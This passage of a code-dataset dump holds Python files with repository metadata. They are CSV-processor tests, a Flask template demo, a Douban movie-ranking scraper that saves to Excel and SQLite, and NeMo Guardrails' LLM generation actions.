\"Model\", MODEL_VALUES, 0, \"qualitative\"))\n assert(run_metadata_asserts(test_file.Color, 2, \"Color\", COLOR_VALUES, 0, \"qualitative\"))\n assert(run_metadata_asserts(test_file.Miles, 3, \"Miles\", EMPTY_VALUES, 4, \"quantitative\"))\n assert(run_metadata_asserts(test_file.MPG, 4, \"MPG\", EMPTY_VALUES, 4, \"quantitative\"))\n assert(run_metadata_asserts(test_file.Cost, 5, \"Cost\", {\"N.A.\": 1}, 3, \"both\"))\n\ndef test_create_file(mocker, simple_csv):\n mocker.patch('builtins.open', simple_csv)\n test_file = DataFile(\"../test_data/Data.csv\")\n alt_file = DataFile.create(\"../test_data/Data.csv\")\n\n assert(test_file == alt_file)\n\ndef test_show_metadata_qual_data(mocker, simple_csv):\n mocker.patch('builtins.open', simple_csv)\n test_file = DataFile(\"../test_data/Data.csv\")\n\n MANUFACTURER_META_REPORT = build_metadata_string(0, \"Manufacturer\", \"qualitative\", MANUFACTURER_VALUES, EMPTY_VALUES)\n manufacturer_report = test_file.show_metadata(\"Manufacturer\")\n assert(MANUFACTURER_META_REPORT == manufacturer_report)\n\ndef test_show_metadata_quant_data(mocker, simple_csv):\n mocker.patch('builtins.open', simple_csv)\n test_file = DataFile(\"../test_data/Data.csv\")\n\n MPG_META_REPORT = build_metadata_string(4, \"MPG\", \"quantitative\", EMPTY_VALUES, MPG_VALUES)\n MPG_report = test_file.show_metadata(\"MPG\")\n assert(MPG_META_REPORT == MPG_report)\n\ndef test_show_metadata_both_data(mocker, simple_csv):\n mocker.patch('builtins.open', simple_csv)\n test_file = DataFile(\"../test_data/Data.csv\")\n\n COST_META_REPORT = build_metadata_string(5, \"Cost\", \"both\", COST_QUAL_VALUES, COST_QUANT_VALUES)\n cost_report = test_file.show_metadata(\"Cost\")\n assert(COST_META_REPORT == cost_report)\n\ndef test_update_column_value_no_kwargs(update_cost_csv):\n test_file = \"../test_data/simple.csv\"\n create_simple_csv(test_file)\n destination_file = \"update_column_test.csv\"\n data_file = DataFile(test_file)\n data_file.update_value(\"N.A.\", -1,\"Cost\", new_file_name=destination_file)\n test_file = open(\"../test_data/\" + destination_file, \"r\")\n with patch(\"builtins.open\", update_cost_csv):\n with open(\"../test_data/simple.csv\", \"r\") as correct_file:\n test_lines = test_file.readlines()\n for test_line in test_lines:\n correct_line = correct_file.readline()\n #print(test_line)\n #print(correct_line)\n assert(test_line == correct_line)\n test_file.close()\n os.remove(\"../test_data/\" + destination_file)\n os.remove(\"../test_data/simple.csv\")\n\ndef test_update_column_value_kwargs(update_miles_csv):\n test_file = \"../test_data/simple.csv\"\n create_simple_csv(test_file)\n destination_file = \"update_column_test.csv\"\n data_file = DataFile(test_file)\n data_file.update_value(75000, 76000,\"Miles\", new_file_name=destination_file, Model=\"Camry\")\n test_file = open(\"../test_data/\" + destination_file, \"r\")\n with patch(\"builtins.open\", update_miles_csv):\n with open(\"../test_data/simple.csv\", \"r\") as correct_file:\n test_lines = test_file.readlines()\n for test_line in test_lines:\n correct_line = correct_file.readline()\n #print(test_line)\n #print(correct_line)\n assert(test_line.replace(\",\", \"\").replace(\"$\", \"\").replace('\"', \"\") == correct_line.replace(\",\", \"\").replace(\"$\", \"\").replace('\"', \"\"))\n test_file.close()\n os.remove(\"../test_data/\" + destination_file)\n os.remove(\"../test_data/simple.csv\")\n\n\n\n", "repo_name": "DevinDuval09/csv_processor", "sub_path": "csv_processor/tests/DataFileTests.py", "file_name": 
"DataFileTests.py", "file_ext": "py", "file_size_in_byte": 7177, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "mock.mock_open", "line_number": 27, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 18, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 37, "usage_type": "call"}, {"api_name": "os.path", "line_number": 37, "usage_type": "attribute"}, {"api_name": "csv.writer", "line_number": 39, "usage_type": "call"}, {"api_name": "mock.mock_open", "line_number": 52, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 43, "usage_type": "call"}, {"api_name": "mock.mock_open", "line_number": 63, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 54, "usage_type": "call"}, {"api_name": "DataFile.DataFile", "line_number": 97, "usage_type": "call"}, {"api_name": "DataFile.DataFile", "line_number": 108, "usage_type": "call"}, {"api_name": "DataFile.DataFile.create", "line_number": 109, "usage_type": "call"}, {"api_name": "DataFile.DataFile", "line_number": 109, "usage_type": "name"}, {"api_name": "DataFile.DataFile", "line_number": 115, "usage_type": "call"}, {"api_name": "DataFile.DataFile", "line_number": 123, "usage_type": "call"}, {"api_name": "DataFile.DataFile", "line_number": 131, "usage_type": "call"}, {"api_name": "DataFile.DataFile", "line_number": 141, "usage_type": "call"}, {"api_name": "unittest.mock.patch", "line_number": 144, "usage_type": "call"}, {"api_name": "os.remove", "line_number": 153, "usage_type": "call"}, {"api_name": "os.remove", "line_number": 154, "usage_type": "call"}, {"api_name": "DataFile.DataFile", "line_number": 160, "usage_type": "call"}, {"api_name": "unittest.mock.patch", "line_number": 163, "usage_type": "call"}, {"api_name": "os.remove", "line_number": 172, "usage_type": "call"}, {"api_name": "os.remove", "line_number": 173, "usage_type": "call"}]}
+{"seq_id": "5508335903", "text": "# https://blog.miguelgrinberg.com/post/the-flask-mega-tutorial-part-ii-templates\n\nfrom flask import render_template\nfrom flask import Flask\napp = Flask(__name__)\n\n\n@app.route('/')\n@app.route('/')\ndef index(name):\n user = {'username': name}\n return render_template('index.html', title='Great!', user=user)\n", "repo_name": "umbcdata601/spring2020", "sub_path": "jupyter_notebooks/week_05_automation/flask_demo/html_from_template/my_flask.py", "file_name": "my_flask.py", "file_ext": "py", "file_size_in_byte": 317, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 11, "dataset": "github-code", "pt": "53", "api": [{"api_name": "flask.Flask", "line_number": 5, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 12, "usage_type": "call"}]}
+{"seq_id": "71373161448", "text": "# https://movie.douban.com/top250\n# 爬取豆瓣电影Top250的基本信息, 包括电源的名称, 豆瓣评分, 评价数, 电影概况, 电影链接等.\n\n# coding=utf-8\nfrom bs4 import BeautifulSoup # 网页解析, 获取数据\nimport re # 正则表达式, 进行文字匹配\nimport urllib.request, urllib.error # 指定URL, 获取网页数据\nimport xlwt # 进行excel操作\nimport sqlite3 # 进行SQLite数据库操作\n\ndef main():\n baseurl = 'https://movie.douban.com/top250?start='\n # 1.爬取网页\n data_list = getData(baseurl)\n print(data_list)\n print(len(data_list))\n # print(len(data_list))\n save_path = './moviesTop250.xls'\n # 3.保存数据\n # saveData(save_path, data_list)\n saveDataToSQlite(data_list, 'movieTop250')\n\n\ndef askURL(url):\n # 伪装成浏览器\n head = {\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36 Edg/95.0.1020.30\",\n \"Referer\": url\n }\n request = urllib.request.Request(url=url, headers=head)\n html = \"\"\n try:\n response = urllib.request.urlopen(request)\n html = response.read().decode('utf-8')\n # print(html)\n except urllib.error.URLError as e:\n print(e)\n return html\n\n# 正则表达式\nsuper_link = re.compile(r'') # 爬取超链接\nimg_link = re.compile(r'', re.S) # 爬取图片链接 re.S让换行符包含在连接中\ntitle = re.compile(r'(.*?) ') # 电影名\nrate = re.compile(r'(.*?) ') # 电影评分\njudge = re.compile(r'(.*?)人评价 ') # 评价人数\ninq = re.compile(r'(.*?) ') # 电影概况\nBd = re.compile(r'(.*?)
', re.S) # 相关内容\n\n\n\ndef getData(baseurl):\n data_list = []\n for i in range(10):\n url = baseurl + str(i * 25)\n html = askURL(url)\n # 逐一解析网页\n soup = BeautifulSoup(html, 'html.parser')\n for item in soup.find_all('div', class_='item'):\n data = [] # 保存一部电影的所有信息\n item = str(item)\n # print(item)\n link = re.findall(super_link, item)[0] # 通过正侧表达式查找指定的字符串\n # print(link)\n data.append(link)\n data.append(re.findall(img_link, item)[0])\n data.append(re.findall(title, item)[0])\n data.append(re.findall(rate, item)[0])\n data.append(re.findall(judge, item)[0])\n data.append(\"\" if re.findall(inq, item) == [] else re.findall(inq, item)[0]) # 有可能为空\n data.append(re.findall(Bd, item)[0].replace(\" \", \"\"))\n\n data_list.append(data)\n\n return data_list\n\ndef saveData(save_path, data_list):\n workbook = xlwt.Workbook(encoding='utf-8') # 创建workbook对象\n worksheet = workbook.add_sheet('sheet1') # 创建工作表\n col = [\"电影详情链接\", \"图���链接\", \"中文名\", \"评分\", \"评价人数\", \"概况\", \"其他信息\"]\n for i in range(7):\n worksheet.write(0, i, col[i])\n for i in range(len(data_list)):\n for j in range(len(data_list[0])):\n worksheet.write(i+1, j, data_list[i][j])\n workbook.save(save_path)\n\ndef init_SQLite(dbpath):\n import sqlite3\n\n conn = sqlite3.connect(dbpath) # 打开或创建数据库文件\n print(\"Opened database successfully.\")\n\n cursor = conn.cursor() # 获取游标\n sql = ''' \n create table moviesTop250(\n id integer primary key autoincrement,\n super_link text not null,\n img_link text not null,\n name varchar not null,\n score numeric,\n num numeric,\n instroduction text,\n info text\n ) \n '''\n\n cursor.execute(sql)\n conn.commit() # 提交数据库操作\n\ndef saveDataToSQlite(data_list, dbpath):\n init_SQLite(dbpath)\n conn = sqlite3.connect(dbpath)\n cursor = conn.cursor()\n\n id = 1\n for data in data_list:\n # 拼写数据\n for index in range(len(data)):\n data[index] = '\"' + data[index] + '\"'\n sql = '''\n insert into moviesTop250 (\n id, super_link, img_link, name, score, num, instroduction, info)\n values (%s)\n '''%(f'\"{id}\",' + \",\".join(data))\n # print(sql)\n cursor.execute(sql)\n conn.commit()\n id += 1\n\n conn.close()\n\n\nif __name__ == '__main__':\n # askURL('https://baidu.com')\n main()", "repo_name": "yruns/Web_Crawler", "sub_path": "Moives/Movies.py", "file_name": "Movies.py", "file_ext": "py", "file_size_in_byte": 4653, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "urllib.request.request.Request", "line_number": 30, "usage_type": "call"}, {"api_name": "urllib.request.request", "line_number": 30, "usage_type": "attribute"}, {"api_name": "urllib.request", "line_number": 30, "usage_type": "name"}, {"api_name": "urllib.request.request.urlopen", "line_number": 33, "usage_type": "call"}, {"api_name": "urllib.request.request", "line_number": 33, "usage_type": "attribute"}, {"api_name": "urllib.request", "line_number": 33, "usage_type": "name"}, {"api_name": "urllib.request.error", "line_number": 36, "usage_type": "attribute"}, {"api_name": "urllib.request", "line_number": 36, "usage_type": "name"}, {"api_name": "re.compile", "line_number": 41, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 42, "usage_type": "call"}, {"api_name": "re.S", "line_number": 42, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 43, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 44, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 45, "usage_type": "call"}, {"api_name": "re.compile", 
"line_number": 46, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 47, "usage_type": "call"}, {"api_name": "re.S", "line_number": 47, "usage_type": "attribute"}, {"api_name": "bs4.BeautifulSoup", "line_number": 57, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 62, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 65, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 66, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 67, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 68, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 69, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 70, "usage_type": "call"}, {"api_name": "xlwt.Workbook", "line_number": 77, "usage_type": "call"}, {"api_name": "sqlite3.connect", "line_number": 90, "usage_type": "call"}, {"api_name": "sqlite3.connect", "line_number": 112, "usage_type": "call"}]}
+{"seq_id": "70313852647", "text": "import asyncio\nimport logging\nimport random\nimport re\nimport sys\nimport threading\nimport uuid\nfrom ast import literal_eval\nfrom functools import lru_cache\nfrom time import time\nfrom typing import Callable, List, Optional\n\nfrom jinja2 import Environment, meta\nfrom langchain.llms import BaseLLM\n\nfrom nemoguardrails.actions.actions import ActionResult, action\nfrom nemoguardrails.actions.llm.utils import (\n flow_to_colang,\n get_first_nonempty_line,\n get_last_bot_intent_event,\n get_last_user_intent_event,\n get_last_user_utterance_event,\n get_multiline_response,\n get_retrieved_relevant_chunks,\n llm_call,\n strip_quotes,\n)\nfrom nemoguardrails.embeddings.index import EmbeddingsIndex, IndexItem\nfrom nemoguardrails.language.parser import parse_colang_file\nfrom nemoguardrails.llm.params import llm_params\nfrom nemoguardrails.llm.taskmanager import LLMTaskManager\nfrom nemoguardrails.llm.types import Task\nfrom nemoguardrails.patch_asyncio import check_sync_call_from_async_loop\nfrom nemoguardrails.rails.llm.config import EmbeddingSearchProvider, RailsConfig\nfrom nemoguardrails.utils import new_event_dict\n\nlog = logging.getLogger(__name__)\n\n\nclass LLMGenerationActions:\n \"\"\"A container objects for multiple related actions.\"\"\"\n\n def __init__(\n self,\n config: RailsConfig,\n llm: BaseLLM,\n llm_task_manager: LLMTaskManager,\n get_embedding_search_provider_instance: Callable[\n [Optional[EmbeddingSearchProvider]], EmbeddingsIndex\n ],\n verbose: bool = False,\n ):\n self.config = config\n self.llm = llm\n self.verbose = verbose\n\n # If we have user messages, we build an index with them\n self.user_message_index = None\n self.bot_message_index = None\n self.flows_index = None\n\n self.get_embedding_search_provider_instance = (\n get_embedding_search_provider_instance\n )\n\n if check_sync_call_from_async_loop():\n t = threading.Thread(target=asyncio.run, args=(self.init(),))\n t.start()\n t.join()\n else:\n asyncio.run(self.init())\n\n self.llm_task_manager = llm_task_manager\n\n # We also initialize the environment for rendering bot messages\n self.env = Environment()\n\n async def init(self):\n await asyncio.gather(\n self._init_user_message_index(),\n self._init_bot_message_index(),\n self._init_flows_index(),\n )\n\n async def _init_user_message_index(self):\n \"\"\"Initializes the index of user messages.\"\"\"\n\n if not self.config.user_messages:\n return\n\n items = []\n for intent, utterances in self.config.user_messages.items():\n for text in utterances:\n items.append(IndexItem(text=text, meta={\"intent\": intent}))\n\n # If we have no patterns, we stop.\n if len(items) == 0:\n return\n\n self.user_message_index = self.get_embedding_search_provider_instance(\n self.config.core.embedding_search_provider\n )\n await self.user_message_index.add_items(items)\n\n # NOTE: this should be very fast, otherwise needs to be moved to separate thread.\n await self.user_message_index.build()\n\n async def _init_bot_message_index(self):\n \"\"\"Initializes the index of bot messages.\"\"\"\n\n if not self.config.bot_messages:\n return\n\n items = []\n for intent, utterances in self.config.bot_messages.items():\n for text in utterances:\n items.append(IndexItem(text=intent, meta={\"text\": text}))\n\n # If we have no patterns, we stop.\n if len(items) == 0:\n return\n\n self.bot_message_index = self.get_embedding_search_provider_instance(\n self.config.core.embedding_search_provider\n )\n await 
self.bot_message_index.add_items(items)\n\n # NOTE: this should be very fast, otherwise needs to be moved to separate thread.\n await self.bot_message_index.build()\n\n async def _init_flows_index(self):\n \"\"\"Initializes the index of flows.\"\"\"\n\n if not self.config.flows:\n return\n\n items = []\n for flow in self.config.flows:\n # We don't include the default system flows in the index because we don't want\n # the LLM to predict system actions.\n if flow.get(\"id\") in [\n \"generate user intent\",\n \"generate next step\",\n \"generate bot message\",\n ]:\n continue\n\n # TODO: check if the flow has system actions and ignore the flow.\n\n colang_flow = flow.get(\"source_code\") or flow_to_colang(flow)\n\n # We index on the full body for now\n items.append(IndexItem(text=colang_flow, meta={\"flow\": colang_flow}))\n\n # If we have no patterns, we stop.\n if len(items) == 0:\n return\n\n self.flows_index = self.get_embedding_search_provider_instance(\n self.config.core.embedding_search_provider\n )\n await self.flows_index.add_items(items)\n\n # NOTE: this should be very fast, otherwise needs to be moved to separate thread.\n await self.flows_index.build()\n\n def _get_general_instruction(self):\n \"\"\"Helper to extract the general instruction.\"\"\"\n text = \"\"\n for instruction in self.config.instructions:\n if instruction.type == \"general\":\n text = instruction.content\n\n # We stop at the first one for now\n break\n\n return text\n\n @lru_cache\n def _get_sample_conversation_two_turns(self):\n \"\"\"Helper to extract only the two turns from the sample conversation.\n\n This is needed to be included to \"seed\" the conversation so that the model\n can follow the format more easily.\n \"\"\"\n lines = self.config.sample_conversation.split(\"\\n\")\n i = 0\n user_count = 0\n while i < len(lines):\n if lines[i].startswith(\"user \"):\n user_count += 1\n\n if user_count == 3:\n break\n\n i += 1\n\n sample_conversation = \"\\n\".join(lines[0:i])\n\n # Remove any trailing new lines\n sample_conversation = sample_conversation.strip()\n\n return sample_conversation\n\n @action(is_system_action=True)\n async def generate_user_intent(\n self, events: List[dict], llm: Optional[BaseLLM] = None\n ):\n \"\"\"Generate the canonical form for what the user said i.e. user intent.\"\"\"\n\n # The last event should be the \"StartInternalSystemAction\" and the one before it the \"UtteranceUserActionFinished\".\n event = get_last_user_utterance_event(events)\n assert event[\"type\"] == \"UtteranceUserActionFinished\"\n\n # Use action specific llm if registered else fallback to main llm\n llm = llm or self.llm\n\n # TODO: check for an explicit way of enabling the canonical form detection\n\n if self.config.user_messages:\n # TODO: based on the config we can use a specific canonical forms model\n # or use the LLM to detect the canonical form. 
The below implementation\n # is for the latter.\n\n log.info(\"Phase 1: Generating user intent\")\n\n # We search for the most relevant similar user utterance\n examples = \"\"\n potential_user_intents = []\n\n if self.user_message_index:\n results = await self.user_message_index.search(\n text=event[\"final_transcript\"], max_results=5\n )\n\n # We add these in reverse order so the most relevant is towards the end.\n for result in reversed(results):\n examples += f\"user \\\"{result.text}\\\"\\n {result.meta['intent']}\\n\\n\"\n potential_user_intents.append(result.meta[\"intent\"])\n\n prompt = self.llm_task_manager.render_task_prompt(\n task=Task.GENERATE_USER_INTENT,\n events=events,\n context={\n \"examples\": examples,\n \"potential_user_intents\": \", \".join(potential_user_intents),\n },\n )\n\n # We make this call with temperature 0 to have it as deterministic as possible.\n with llm_params(llm, temperature=self.config.lowest_temperature):\n result = await llm_call(llm, prompt)\n\n # Parse the output using the associated parser\n result = self.llm_task_manager.parse_task_output(\n Task.GENERATE_USER_INTENT, output=result\n )\n\n user_intent = get_first_nonempty_line(result)\n if user_intent is None:\n user_intent = \"unknown message\"\n\n if user_intent and user_intent.startswith(\"user \"):\n user_intent = user_intent[5:]\n\n log.info(\n \"Canonical form for user intent: \"\n + (user_intent if user_intent else \"None\")\n )\n\n if user_intent is None:\n return ActionResult(\n events=[new_event_dict(\"UserIntent\", intent=\"unknown message\")]\n )\n else:\n return ActionResult(\n events=[new_event_dict(\"UserIntent\", intent=user_intent)]\n )\n else:\n prompt = self.llm_task_manager.render_task_prompt(\n task=Task.GENERAL, events=events\n )\n\n # We make this call with temperature 0 to have it as deterministic as possible.\n result = await llm_call(llm, prompt)\n\n return ActionResult(\n events=[\n new_event_dict(\"StartUtteranceBotAction\", script=result.strip())\n ]\n )\n\n @action(is_system_action=True)\n async def generate_next_step(\n self, events: List[dict], llm: Optional[BaseLLM] = None\n ):\n \"\"\"Generate the next step in the current conversation flow.\n\n Currently, only generates a next step after a user intent.\n \"\"\"\n log.info(\"Phase 2 :: Generating next step ...\")\n\n # Use action specific llm if registered else fallback to main llm\n llm = llm or self.llm\n\n # The last event should be the \"StartInternalSystemAction\" and the one before it the \"UserIntent\".\n event = get_last_user_intent_event(events)\n\n # Currently, we only predict next step after a user intent using LLM\n if event[\"type\"] == \"UserIntent\":\n user_intent = event[\"intent\"]\n\n # We search for the most relevant similar flows\n examples = \"\"\n if self.flows_index:\n results = await self.flows_index.search(text=user_intent, max_results=5)\n\n # We add these in reverse order so the most relevant is towards the end.\n for result in reversed(results):\n examples += f\"{result.text}\\n\\n\"\n\n prompt = self.llm_task_manager.render_task_prompt(\n task=Task.GENERATE_NEXT_STEPS,\n events=events,\n context={\"examples\": examples},\n )\n\n # We use temperature 0 for next step prediction as well\n with llm_params(llm, temperature=self.config.lowest_temperature):\n result = await llm_call(llm, prompt)\n\n # Parse the output using the associated parser\n result = self.llm_task_manager.parse_task_output(\n Task.GENERATE_NEXT_STEPS, output=result\n )\n\n # If we don't have multi-step generation 
enabled, we only look at the first line.\n if not self.config.enable_multi_step_generation:\n result = get_first_nonempty_line(result)\n\n if result and result.startswith(\"bot \"):\n next_step = {\"bot\": result[4:]}\n else:\n next_step = {\"bot\": \"general response\"}\n\n # If we have to execute an action, we return the event to start it\n if next_step.get(\"execute\"):\n return ActionResult(\n events=[\n new_event_dict(\n \"StartInternalSystemAction\",\n action_name=next_step[\"execute\"],\n )\n ]\n )\n else:\n bot_intent = next_step.get(\"bot\")\n\n return ActionResult(\n events=[new_event_dict(\"BotIntent\", intent=bot_intent)]\n )\n else:\n # Otherwise, we parse the output as a single flow.\n # If we have a parsing error, we try to reduce size of the flow, potentially\n # up to a single step.\n lines = result.split(\"\\n\")\n while True:\n try:\n parse_colang_file(\"dynamic.co\", content=\"\\n\".join(lines))\n break\n except Exception as e:\n # If we could not parse the flow on the last line, we return a general response\n if len(lines) == 1:\n log.info(\"Exception while parsing single line: %s\", e)\n return ActionResult(\n events=[\n new_event_dict(\n \"BotIntent\", intent=\"general response\"\n )\n ]\n )\n\n log.info(\"Could not parse %s lines, reducing size\", len(lines))\n lines = lines[:-1]\n\n return ActionResult(\n events=[\n # We generate a random UUID as the flow_id\n new_event_dict(\n \"start_flow\",\n flow_id=str(uuid.uuid4()),\n flow_body=\"\\n\".join(lines),\n )\n ]\n )\n\n return ActionResult(return_value=None)\n\n def _render_string(\n self,\n template_str: str,\n context: Optional[dict] = None,\n ) -> str:\n \"\"\"Render a string using the provided context information.\n\n Args:\n template_str: The string template to render.\n context: The context for rendering.\n\n Returns:\n The rendered string.\n \"\"\"\n # First, if we have any direct usage of variables in the string,\n # we replace with correct Jinja syntax.\n for param in re.findall(r\"\\$([^ \\\"'!?\\-,;]*(?:\\w|]))\", template_str):\n template_str = template_str.replace(f\"${param}\", \"{{\" + param + \"}}\")\n\n template = self.env.from_string(template_str)\n\n # First, we extract all the variables from the template.\n variables = meta.find_undeclared_variables(self.env.parse(template_str))\n\n # This is the context that will be passed to the template when rendering.\n render_context = {}\n\n # Copy the context variables to the render context.\n if context:\n for variable in variables:\n if variable in context:\n render_context[variable] = context[variable]\n\n return template.render(render_context)\n\n @action(is_system_action=True)\n async def generate_bot_message(\n self, events: List[dict], context: dict, llm: Optional[BaseLLM] = None\n ):\n \"\"\"Generate a bot message based on the desired bot intent.\"\"\"\n log.info(\"Phase 3 :: Generating bot message ...\")\n\n # Use action specific llm if registered else fallback to main llm\n llm = llm or self.llm\n\n # The last event should be the \"StartInternalSystemAction\" and the one before it the \"BotIntent\".\n event = get_last_bot_intent_event(events)\n assert event[\"type\"] == \"BotIntent\"\n bot_intent = event[\"intent\"]\n context_updates = {}\n\n if bot_intent in self.config.bot_messages:\n # Choose a message randomly from self.config.bot_messages[bot_message]\n # However, in test mode, we always choose the first one, to keep it predictable.\n if \"pytest\" in sys.modules:\n bot_utterance = self.config.bot_messages[bot_intent][0]\n else:\n 
bot_utterance = random.choice(self.config.bot_messages[bot_intent])\n\n log.info(\"Found existing bot message: \" + bot_utterance)\n\n # We also need to render\n bot_utterance = self._render_string(bot_utterance, context)\n\n # Check if the output is supposed to be the content of a context variable\n elif bot_intent[0] == \"$\" and bot_intent[1:] in context:\n bot_utterance = context[bot_intent[1:]]\n\n else:\n # We search for the most relevant similar bot utterance\n examples = \"\"\n # NOTE: disabling bot message index when there are no user messages\n if self.config.user_messages and self.bot_message_index:\n results = await self.bot_message_index.search(\n text=event[\"intent\"], max_results=5\n )\n\n # We add these in reverse order so the most relevant is towards the end.\n for result in reversed(results):\n examples += f\"bot {result.text}\\n \\\"{result.meta['text']}\\\"\\n\\n\"\n\n # We compute the relevant chunks to be used as context\n relevant_chunks = get_retrieved_relevant_chunks(events)\n\n prompt = self.llm_task_manager.render_task_prompt(\n task=Task.GENERATE_BOT_MESSAGE,\n events=events,\n context={\"examples\": examples, \"relevant_chunks\": relevant_chunks},\n )\n\n t0 = time()\n result = await llm_call(llm, prompt)\n log.info(\n \"--- :: LLM Bot Message Generation call took %.2f seconds\", time() - t0\n )\n\n # Parse the output using the associated parser\n result = self.llm_task_manager.parse_task_output(\n Task.GENERATE_BOT_MESSAGE, output=result\n )\n\n # TODO: catch openai.error.InvalidRequestError from exceeding max token length\n\n result = get_multiline_response(result)\n result = strip_quotes(result)\n\n bot_utterance = result\n\n # Context variable starting with \"_\" are considered private (not used in tests or logging)\n context_updates[\"_last_bot_prompt\"] = prompt\n\n log.info(f\"Generated bot message: {bot_utterance}\")\n\n if bot_utterance:\n return ActionResult(\n events=[\n new_event_dict(\"StartUtteranceBotAction\", script=bot_utterance)\n ],\n context_updates=context_updates,\n )\n else:\n return ActionResult(\n events=[\n new_event_dict(\n \"StartUtteranceBotAction\", script=\"I'm not sure what to say.\"\n )\n ],\n context_updates=context_updates,\n )\n\n @action(is_system_action=True)\n async def generate_value(\n self,\n instructions: str,\n events: List[dict],\n var_name: Optional[str] = None,\n llm: Optional[BaseLLM] = None,\n ):\n \"\"\"Generate a value in the context of the conversation.\n\n :param instructions: The instructions to generate the value.\n :param events: The full stream of events so far.\n :param var_name: The name of the variable to generate. 
If not specified, it will use\n the `action_result_key` as the name of the variable.\n :param llm: Custom llm model to generate_value\n \"\"\"\n # Use action specific llm if registered else fallback to main llm\n llm = llm or self.llm\n\n last_event = events[-1]\n assert last_event[\"type\"] == \"StartInternalSystemAction\"\n\n if not var_name:\n var_name = last_event[\"action_result_key\"]\n\n # We search for the most relevant flows.\n examples = \"\"\n if self.flows_index:\n results = await self.flows_index.search(\n text=f\"${var_name} = \", max_results=5\n )\n\n # We add these in reverse order so the most relevant is towards the end.\n for result in reversed(results):\n # If the flow includes \"= ...\", we ignore it as we don't want the LLM\n # to learn to predict \"...\".\n if not re.findall(r\"=\\s+\\.\\.\\.\", result.text):\n examples += f\"{result.text}\\n\\n\"\n\n prompt = self.llm_task_manager.render_task_prompt(\n task=Task.GENERATE_VALUE,\n events=events,\n context={\n \"examples\": examples,\n \"instructions\": instructions,\n \"var_name\": var_name,\n },\n )\n\n with llm_params(llm, temperature=self.config.lowest_temperature):\n result = await llm_call(llm, prompt)\n\n # Parse the output using the associated parser\n result = self.llm_task_manager.parse_task_output(\n Task.GENERATE_VALUE, output=result\n )\n\n # We only use the first line for now\n # TODO: support multi-line values?\n value = result.strip().split(\"\\n\")[0]\n\n # Because of conventions from other languages, sometimes the LLM might add\n # a \";\" at the end of the line. We remove that\n if value.endswith(\";\"):\n value = value[:-1]\n\n log.info(f\"Generated value for ${var_name}: {value}\")\n\n return literal_eval(value)\n", "repo_name": "NVIDIA/NeMo-Guardrails", "sub_path": "nemoguardrails/actions/llm/generation.py", "file_name": "generation.py", "file_ext": "py", "file_size_in_byte": 21995, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2560, "dataset": "github-code", "pt": "53", "api": [{"api_name": "logging.getLogger", "line_number": 37, "usage_type": "call"}, {"api_name": "nemoguardrails.rails.llm.config.RailsConfig", "line_number": 45, "usage_type": "name"}, {"api_name": "langchain.llms.BaseLLM", "line_number": 46, "usage_type": "name"}, {"api_name": "nemoguardrails.llm.taskmanager.LLMTaskManager", "line_number": 47, "usage_type": "name"}, {"api_name": "typing.Callable", "line_number": 48, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 49, "usage_type": "name"}, {"api_name": "nemoguardrails.rails.llm.config.EmbeddingSearchProvider", "line_number": 49, "usage_type": "name"}, {"api_name": "nemoguardrails.embeddings.index.EmbeddingsIndex", "line_number": 49, "usage_type": "name"}, {"api_name": "nemoguardrails.patch_asyncio.check_sync_call_from_async_loop", "line_number": 66, "usage_type": "call"}, {"api_name": "threading.Thread", "line_number": 67, "usage_type": "call"}, {"api_name": "asyncio.run", "line_number": 67, "usage_type": "attribute"}, {"api_name": "asyncio.run", "line_number": 71, "usage_type": "call"}, {"api_name": "jinja2.Environment", "line_number": 76, "usage_type": "call"}, {"api_name": "asyncio.gather", "line_number": 79, "usage_type": "call"}, {"api_name": "nemoguardrails.embeddings.index.IndexItem", "line_number": 94, "usage_type": "call"}, {"api_name": "nemoguardrails.embeddings.index.IndexItem", "line_number": 117, "usage_type": "call"}, {"api_name": "nemoguardrails.actions.llm.utils.flow_to_colang", "line_number": 150, "usage_type": 
"call"}, {"api_name": "nemoguardrails.embeddings.index.IndexItem", "line_number": 153, "usage_type": "call"}, {"api_name": "functools.lru_cache", "line_number": 179, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 207, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 207, "usage_type": "name"}, {"api_name": "langchain.llms.BaseLLM", "line_number": 207, "usage_type": "name"}, {"api_name": "nemoguardrails.actions.llm.utils.get_last_user_utterance_event", "line_number": 212, "usage_type": "call"}, {"api_name": "nemoguardrails.llm.types.Task.GENERATE_USER_INTENT", "line_number": 242, "usage_type": "attribute"}, {"api_name": "nemoguardrails.llm.types.Task", "line_number": 242, "usage_type": "name"}, {"api_name": "nemoguardrails.llm.params.llm_params", "line_number": 251, "usage_type": "call"}, {"api_name": "nemoguardrails.actions.llm.utils.llm_call", "line_number": 252, "usage_type": "call"}, {"api_name": "nemoguardrails.llm.types.Task.GENERATE_USER_INTENT", "line_number": 256, "usage_type": "attribute"}, {"api_name": "nemoguardrails.llm.types.Task", "line_number": 256, "usage_type": "name"}, {"api_name": "nemoguardrails.actions.llm.utils.get_first_nonempty_line", "line_number": 259, "usage_type": "call"}, {"api_name": "nemoguardrails.actions.actions.ActionResult", "line_number": 272, "usage_type": "call"}, {"api_name": "nemoguardrails.utils.new_event_dict", 